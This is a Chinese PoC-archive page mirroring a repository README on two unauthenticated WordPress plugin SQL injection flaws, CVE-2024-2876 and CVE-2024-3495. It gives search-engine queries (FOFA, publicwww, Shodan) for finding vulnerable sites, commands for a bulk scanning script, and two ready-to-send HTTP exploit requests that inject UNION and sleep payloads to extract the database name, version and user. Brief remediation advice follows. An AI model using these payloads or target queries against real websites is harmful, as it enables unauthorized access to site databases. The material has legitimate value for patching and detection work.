POC详情: 02b832679901c71eb1a7f9ad3ad62955a2f9df27

来源
关联漏洞
标题: WordPress Plugin email-subscribers SQL注入漏洞 (CVE-2024-2876)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin email-subscribers 5.7.14及之前版本存在SQL注入漏洞,该漏洞源于 IG_ES_Subscribers_Query 中的 run函数对用户提供的参数转义不充分,攻击者利用该漏洞可以将额外的 SQL 查询附
描述
WP-SQL-Injection CVE-2024-2876 AND 2024-CVE-2024-3495
介绍
---

# WP-SQL Injection Vulnerabilities: CVE-2024-2876 and CVE-2024-3495

This repository documents two SQL injection vulnerabilities affecting WordPress plugins. Below are descriptions, queries, proof of concept (PoC) scripts, and remediation steps for each vulnerability.

## Vulnerability Descriptions

### Description - CVE-2024-2876
The **Email Subscribers by Icegram Express** plugin for WordPress (versions up to 5.7.14) is vulnerable to SQL injection in the `run` function of the `IG_ES_Subscribers_Query` class. Due to insufficient escaping and lack of SQL query preparation, unauthenticated attackers can exploit this vulnerability to inject malicious SQL, potentially accessing sensitive data.

### Description - CVE-2024-3495
The **Country State City Dropdown CF7** plugin for WordPress (versions up to 2.7.2) is vulnerable to SQL injection via the `cnt` and `sid` parameters. This insufficient escaping allows unauthenticated attackers to execute arbitrary SQL commands, leading to unauthorized access to sensitive database information.

## Scanner Script
To scan for vulnerabilities in CVE-2024-2876 and CVE-2024-3495, use the following script:

```bash
python3 CVE-2024-2876.py -u http://website.com
python3 CVE-2024-2876.py -f urls.txt
```

## Querying for Affected Sites

### Query for CVE-2024-2876
- **FOFA**: `body="/wp-content/plugins/email-subscribers/"`
- **publicwww**: `"/wp-content/plugins/email-subscribers/"`

### Query for CVE-2024-3495
- **FOFA**: `body="/wp-content/plugins/country-state-city-auto-dropdown" && header="HTTP/1.1 200 OK"`
- **Publicwww**: `"/wp-content/plugins/country-state-city-auto-dropdown"`
- **Shodan**: `"http.title:admin-ajax.php"`

## Proof of Concept (PoC) Code Blocks

### PoC - CVE-2024-2876
Example exploit using the SQL injection vulnerability via the `admin-post.php` endpoint:

```bash
@timeout: 20s (using burpsuite)
POST /wp-admin/admin-post.php HTTP/1.1
Host: <Host>
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
```

### PoC - CVE-2024-3495
Example exploit using `admin-ajax.php`:

```bash
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <Host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 172

action=tc_csca_get_states&nonce_ajax={{nonce}}&cnt=1+or+0+union+select+concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3--+-
```

## Remediation Steps

### Remediation for CVE-2024-2876
- **Upgrade**: Update the plugin to version 5.7.15 or later (preferably 5.7.19).
- **Automatic Updates**: Patchstack users can enable automatic updates for vulnerable plugins.
- **WAF/WAAP**: Implementing a Web Application Firewall (WAF) or Web Application and API Protection (WAAP) solution can offer protection against known vulnerabilities by blocking suspicious SQL patterns.

## Bounty Information - CVE-2024-2876
For more information on the CVE and bounty details, visit:
- [Wordfence Blog on CVE-2024-2876](https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/)

--- 
文件快照

[4.0K] /data/pocs/02b832679901c71eb1a7f9ad3ad62955a2f9df27 ├── [5.1K] CVE-2024-2876.py ├── [ 845] CVE-2024-2876.yaml ├── [ 944] CVE-2024-3495.yaml └── [3.5K] README.md 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。